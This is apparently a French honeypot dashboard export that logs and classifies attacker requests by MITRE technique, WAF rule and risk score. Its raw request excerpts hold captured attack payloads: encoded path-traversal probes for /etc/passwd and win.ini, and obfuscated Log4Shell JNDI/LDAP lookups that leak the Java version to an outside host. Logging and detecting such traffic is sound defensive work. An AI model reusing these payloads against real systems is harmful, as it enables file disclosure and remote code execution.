| TCP | 8001 · HTTP | http | Scan de ports port scan syn · via HTTP:8001 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /
Émulateur
HTTP
WAF
7
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tags WAF: query-overlong, sap-sapcontrol-path · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 2 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Ligne de requête
User-Agent
—
Règles WAF
query-overlong
sap-sapcontrol-path
Payload (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Requête brute (extrait)
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
|||||||
| TCP | 8003 · HTTP | http | Scan de ports port scan syn · via HTTP:8003 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8003
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8040 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8040 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8040
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac |
|||||||
| TCP | 8040 · HTTP | http | Scan de ports port scan syn · via HTTP:8040 · (reconnaissance) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 58 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8040
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozi
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8040 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8040 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8040
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X |
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) · → /${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:… | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
PUT /${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:r:-i}${gtmi:-:}${4:t:-l}${nqi:g3i4:c:-d}${a:503:-a}$… Sonde Elasticsearch (REST) UA ${${cx1a:-j}${o9:jh:-n}${udv:8x:ams:-d}${lob7:d:a01:-i}${yb:7:e…
Émulateur
ELASTICSEARCH
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:r:-i}${gtmi:-:}${4:t:-l}${nqi:g3i4:c:-d}${a:503:-a}${bcm:v3:zrid:-p}${a:k5:-:}${v5:-/}${di5a:5ws:uh8:-/}${r:3:-P}${ck6:-A}${vd9b:4w:-l}${yu:rtps:vjr1:-0}${03c5:u:-c}${1e:--}${${c4rx:-s}${gp:94n2:-y}${1it3:60o:-s}${s3a:v:-:}${oes:-j}${s:-a}${5g:vr:-v}${dv:yup:c:-a}${gf:91:y:-.}${h:-v}${2:5:-e}${c9:-r}${y:-s}${o45e:zdwa:g:-i}${t:4:ch:-o}${0tid:v:-n}}${as:gi9w:-.}${h:k3qe:0:-b}${jsvr:n:-5}${3b:-8}${4:pnzh:28cx:-1}${1j:-c}${y1:-6}${eu:jid9:o8tk:-1}${yg:js:-b}${s51:
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
9200
Chemin / cible
/${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:r:-i}${gtmi:-:}${4:t:-l}${nqi:g3i4:c:-d}${a:503:-a}${bcm:v3:zrid:-p}${a:k5:-:}${v5:-/}${di5a:5ws:uh8:-/}${r:3:-P…
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${cx1a:-j}${o9:jh:-n}${udv:8x:ams:-d}${lob7:d:a01:-i}${yb:7:et8:-:}${rw:az4h:c:-l}${ldgt:f:-d}${z:-a}${q6:yxs:3:-p}${i:4q:-:}${ik:-/}${z:-/}${6tbl:z:v5:-U}${2q:a0yl:-A}${bu:-l}${8p:bsf9:eg5b:-0}${l…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:r:-i}${gtmi:-:}${4:t:-l}${nqi:g3i4:c:-d}${a:503:-a}${bcm:v3:zrid:-p}${a:k5:-:
Requête brute (extrait)
PUT /${${cm0:tp9:-j}${t:-n}${k6j:axtw:3hv:-d}${z5h:r:-i}${gtmi:-:}${4:t:-l}${nqi:g3i4:c:-d}${a:503:-a}${bcm:v3:zrid:-p}${a:k5:-:}${v5:-/}${di5a:5ws:uh8:-/}${r:3:-P}${ck6:-A}${vd9b:4w:-l}${yu:rtps:vjr1:-0}${03c5:u:-c}${1e:--}${${c4rx:-s}${gp:94n2:-y}${1it3:
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login Sonde Elasticsearch (REST) UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
ELASTICSEARCH
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9200
Chemin / cible
/login
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1624 {"username"
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) · → /login | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login Sonde Elasticsearch (REST) UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
ELASTICSEARCH
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9200
Chemin / cible
/login
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2914 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) · → /${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:… | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:-d}${8u:-i}${qxp:67ol:6h5:-:}${wkq:zt:-l}${o0zd:97bd… Requête Elasticsearch : /${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:… UA ${${u:-j}${bo:ap7n:9:-n}${yq:-d}${ie:gvs:5p:-i}${uq:c:-:}${gk:-…
Émulateur
ELASTICSEARCH
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:-d}${8u:-i}${qxp:67ol:6h5:-:}${wkq:zt:-l}${o0zd:97bd:-d}${08:-a}${et:-p}${pzqb:w:v63:-:}${02:fi8:-/}${vpr:ok:-/}${h:-P}${609:i1sr:-A}${r45:qi:-l}${gn8:an0:-0}${wa:4:s:-c}${ak:s61n:--}${${pnm:h6:07:-s}${0f7:t:-y}${a2:v4:-s}${s0ch:o:-:}${lt7w:9mg3:-j}${qi7:-a}${yv8:bc:sam:-v}${z7:6kiy:elj:-a}${90w:q:-.}${4r:w1p:2:-v}${k:-e}${td:g5p:iw:-r}${tdcy:-s}${ev:-i}${vde:j:7:-o}${zm:ev0z:-n}}${rp:-.}${k:752:nji:-b}${xi7g:-5}${uor1:-8}${b:-1}${sva:-c}${q9t:m:-6}${s:c:-1}${5
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9200
Chemin / cible
/${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:-d}${8u:-i}${qxp:67ol:6h5:-:}${wkq:zt:-l}${o0zd:97bd:-d}${08:-a}${et:-p}${pzqb:w:v63:-:}${02:fi8:-/}${vpr:ok:-/}…
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${u:-j}${bo:ap7n:9:-n}${yq:-d}${ie:gvs:5p:-i}${uq:c:-:}${gk:-l}${scz:-d}${8:it:0xo3:-a}${p3b:d6u:6:-p}${xdq:-:}${ec3t:-/}${6a0:1g:-/}${zu:1:-U}${15cd:gaek:gj:-A}${tvk8:4qd:-l}${vk3:d8gj:zc:-0}${c:9…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:-d}${8u:-i}${qxp:67ol:6h5:-:}${wkq:zt:-l}${o0zd:97bd:-d}${08:-a}${et:-p}${pzq
Requête brute (extrait)
GET /${${3:wkv7:-j}${e1f2:lhua:ca8:-n}${yfq8:q:gqs:-d}${8u:-i}${qxp:67ol:6h5:-:}${wkq:zt:-l}${o0zd:97bd:-d}${08:-a}${et:-p}${pzqb:w:v63:-:}${02:fi8:-/}${vpr:ok:-/}${h:-P}${609:i1sr:-A}${r45:qi:-l}${gn8:an0:-0}${wa:4:s:-c}${ak:s61n:--}${${pnm:h6:07:-s}${0f7
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Sonde Elasticsearch (REST)
Émulateur
ELASTICSEARCH
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9200
Chemin / cible
—
Service
ELASTICSEARCH
Payload
ZSDLKFJ2 /${${1h4e:g:-j}${h:-n}${n41m:6:8:-d}${0:rjp:-i}${d:-:}${7utg:k4if:0foi:-l}${c4:-d}${l:b:u:-a}${2i:-p}${7:toc:61r:-:}${x
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${1h4e:g:-j}${h:-n}${n41m:6:8:-d}${0:rjp:-i}${d:-:}${7utg:k4if:0foi:-l}${c4:-d}${l:b:u:-a}${2i:-p}${7:toc:61r:-:}${x
Requête brute (extrait)
ZSDLKFJ2 /${${1h4e:g:-j}${h:-n}${n41m:6:8:-d}${0:rjp:-i}${d:-:}${7utg:k4if:0foi:-l}${c4:-d}${l:b:u:-a}${2i:-p}${7:toc:61r:-:}${xge:isq8:n58h:-/}${cbse:-/}${79:-P}${0:f6:-A}${mvzl:-l}${0:sbrl:f:-0}${3m9u:-c}${57j6:7:--}${${s8:m:-s}${b2ud:z:-y}${b9n:-s}${at:
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) · → /${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:y… | Élevée | Élevé · 66 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:yd:2fb:-i}${3upw:r:-:}${27:03mn:-l}${2:-d}${wak:-a}${… Requête Elasticsearch : /${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:y… UA ${${7:-j}${ze:dg:j247:-n}${80:y:-d}${tm:y8:3wc6:-i}${pa8r:dxwe:…
Émulateur
ELASTICSEARCH
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:yd:2fb:-i}${3upw:r:-:}${27:03mn:-l}${2:-d}${wak:-a}${2cg:u04:awsu:-p}${fkv:3:ao0:-:}${j4:-/}${q650:-/}${8:hv:-P}${y3l0:tx:a56:-A}${eon:c:j:-l}${q:x:ix:-0}${t1yr:5yn:c:-c}${k:z6:7h2g:--}${${h2gi:-s}${nz:-y}${2e:df:8g:-s}${42:-:}${0g:-j}${i6:0atk:-a}${h:od:w:-v}${unv3:-a}${ozcg:-.}${vpu:t:5y:-v}${7kq3:-e}${j:f2rc:jpfa:-r}${g9xq:2a9:-s}${h9a:1vpr:-i}${o:q:-o}${arg:su:-n}}${8:g:-.}${x:-b}${1:v:zmh:-5}${6ksn:z:txh1:-8}${r69:-1}${9o:3:ilf9:-c}${0f:-6}${g:-1}${prds:be:
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9200
Chemin / cible
/${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:yd:2fb:-i}${3upw:r:-:}${27:03mn:-l}${2:-d}${wak:-a}${2cg:u04:awsu:-p}${fkv:3:ao0:-:}${j4:-/}${q650:-/}${8:hv:-P}$…
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
${${7:-j}${ze:dg:j247:-n}${80:y:-d}${tm:y8:3wc6:-i}${pa8r:dxwe:-:}${rx3:u43:9g8:-l}${6s21:-d}${mx:-a}${91g5:-p}${a2:q:-:}${h2:-/}${f1i:k4a5:-/}${3h:-U}${d1y:-A}${2vz:jin:0:-l}${rqd3:-0}${f:-c}${k2:--…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:yd:2fb:-i}${3upw:r:-:}${27:03mn:-l}${2:-d}${wak:-a}${2cg:u04:awsu:-p}${fkv:3:a
Requête brute (extrait)
GET /${${bx:o6:k:-j}${1:jcm:-n}${j7ug:74:-d}${uos:yd:2fb:-i}${3upw:r:-:}${27:03mn:-l}${2:-d}${wak:-a}${2cg:u04:awsu:-p}${fkv:3:ao0:-:}${j4:-/}${q650:-/}${8:hv:-P}${y3l0:tx:a56:-A}${eon:c:j:-l}${q:x:ix:-0}${t1yr:5yn:c:-c}${k:z6:7h2g:--}${${h2gi:-s}${nz:-y}$
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST / Sonde Elasticsearch (REST) UA ${${ypw:u1:xs:-j}${lmy4:g:3z7:-n}${mf:-d}${6u:a5gb:-i}${v:5:-:}…
Émulateur
ELASTICSEARCH
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9200
Chemin / cible
/
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${ypw:u1:xs:-j}${lmy4:g:3z7:-n}${mf:-d}${6u:a5gb:-i}${v:5:-:}${ft:8h4:-l}${erz:um1a:kq7s:-d}${zpln:-a}${0f:n6hb:-p}${i6c:x4vb:-:}${8sz:qn5t:-/}${m:-/}${sfbx:j3l:pby:-U}${z:-A}${x:p:-l}${md09:-0}${1…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:9200
Accept: */*
User-Agent: ${${ypw:u1:xs:-j}${lmy4:g:3z7:-n}${mf:-d}${6u:a5gb:-i}${v:5:-:}
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: ${${ypw:u1:xs:-j}${lmy4:g:3z7:-n}${mf:-d}${6u:a5gb:-i}${v:5:-:}${ft:8h4:-l}${erz:um1a:kq7s:-d}${zpln:-a}${0f:n6hb:-p}${i6c:x4vb:-:}${8sz:qn5t:-/}${m:-/}${sfbx:j3l:pby:-U}${z:-A}${x:p:-l}${md0
|
|||||||
